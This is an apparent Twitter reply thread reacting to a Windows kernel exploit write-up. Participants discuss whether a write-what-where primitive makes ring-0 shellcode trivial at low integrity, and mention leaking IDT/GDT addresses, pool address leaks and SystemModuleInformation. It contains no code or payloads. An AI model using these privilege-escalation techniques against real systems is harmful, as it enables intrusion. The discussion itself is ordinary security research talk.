Nice writeup! > with the write-what-where primitive in hand, executing ring-0 shellcode should be just a formality Really, at low integrity? Should require an "0day" GDI infoleak or similar no?
-
-
-
Thanks, and good question. I mostly meant it as "formality at Medium", but I guess even at low integrity you could leak the addresses of IDT/GDT and attack them, depending on how Windows was running (VM / bare metal etc.)
-
Not to mention there's many "0-day" kernel address leaks from the pools that Microsoft fixes only in the next version of Windows, like https://bugs.chromium.org/p/project-zero/issues/detail?id=1456 … or some similar bugs.
-
But in the end I agree it's mostly a formality with access to SystemModuleInformation, other scenarios are certainly trickier ;)
End of conversation
New conversation -
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.